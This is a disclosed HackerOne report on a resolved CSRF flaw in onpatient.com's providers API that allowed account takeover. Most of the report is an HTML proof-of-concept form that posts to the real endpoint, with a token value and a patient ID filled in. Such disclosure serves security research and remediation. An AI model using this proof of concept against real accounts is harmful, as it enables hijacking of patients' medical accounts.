[CRITICAL] CSRF leading to account take over

Disclosed: 2016-06-14 22:54:02 By sysecure To drchrono
Unknown
Vulnerability Details
Hi , I have found a CSRF issue that allows an attacker to link his email account to the victim's account and hijack the whole account by adding himself in the providers list . The link: https://onpatient.com/api/v3/providers Content-Type: application/json Vary: Accept Allow: GET, POST, HEAD, OPTIONS [ emails of providers ] #Here is the poc > <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <div class="tab-pane active" id="post-object-form"> <form action="https://onpatient.com/api/v3/providers" method="POST" enctype="multipart/form-data" class="form-horizontal" novalidate=""> <fieldset> <input type="hidden" name="csrfmiddlewaretoken" value="oCSe26NkXpcEJ0X6MQzpZvFVfGY9M5yX"> <div class="form-group"> <label class="col-sm-2 control-label "> Patient </label> <div class="col-sm-10"> <select class="form-control" name="patient"> <option value="213477">saleh ss</option> </select> </div> </div> <div class="form-group "> <label class="col-sm-2 control-label "> Name </label> <div class="col-sm-10"> <input name="name" class="form-control" type="text"> </div> </div> <div class="form-group "> <label class="col-sm-2 control-label "> Specialty </label> <div class="col-sm-10"> <input name="specialty" class="form-control" type="text"> </div> </div> <div class="form-group "> <label class="col-sm-2 control-label "> Fax </label> <div class="col-sm-10"> <input name="fax" class="form-control" type="text"> </div> </div> <div class="form-group "> <label class="col-sm-2 control-label "> Email </label> <div class="col-sm-10"> <input name="email" class="form-control" type="email"> </div> </div> <div class="form-group "> <label class="col-sm-2 control-label "> Phone </label> <div class="col-sm-10"> <input name="phone" class="form-control" type="text"> </div> </div> <div class="form-group "> <label class="col-sm-2 control-label "> Address </label> <div class="col-sm-10"> <textarea name="address" class="form-control"></textarea> </div> </div> <!-- form.non_field_errors --> <div class="form-actions"> <button class="btn btn-primary" title="Make a POST request on the Provider List resource">POST</button> </div> </fieldset> </form> </div> </body> </html>
Actions
View on HackerOne
Report Stats
  • Report ID: 141344
  • State: Closed
  • Substate: resolved
  • Upvotes: 7
Share this report